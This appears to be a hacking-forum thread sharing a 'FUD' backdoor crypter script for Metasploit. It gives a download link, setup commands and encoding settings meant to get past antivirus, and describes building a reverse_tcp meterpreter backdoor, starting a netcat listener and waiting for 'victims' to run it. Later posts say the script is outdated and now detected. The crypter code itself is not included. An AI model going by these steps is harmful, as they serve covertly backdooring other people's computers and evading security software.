I figured I would share this...Believe it or not it actually works! I tested on my own machine. Description: A new undetectable backdoor crypter for metasploit payloads! Script: http://www.mediafire.com/?55q2zisjxif3ez4 You are going to have to place it in the metasploit directory! On Backtrack 5 R3, the directory is: /opt/metasploit/msf3/ Then, we have to make it executable with the following command: Code: Select All chmod +x crypter.py Make sure you have mingw libraries installed: Code: Select All apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils Now go ahead and execute it! Fill in the options to craft your backdoor! The script will automatically launch the listener for you, in my case, since I selected the windows shell payload it launched netcat. From there we wait untill the victim(s) executes the backdoor to spawn a shell in our listener... Original Source: http://www.youtube.com/watch?v=u964EIe-sFc UPDATE: This script is no longer good. Its outdated.
Recommended Seed Number = 7000 and Number of Encode = 14 and you can change to any payload in Script, it's setup on {windows/meterpreter/reverse_tcp}
Just copy it and save it as something.py open terminal and run chmod +x something,py ./something.py You're ready to go
I did a bit of research on it and cant find anything..i tried it on kali as well but no luck. If i cant find any updated fix iI will be removing it. NOTE: it is no longer FUD..antivirus software will detect it. Sent from my LG-MS770 using Tapatalk 2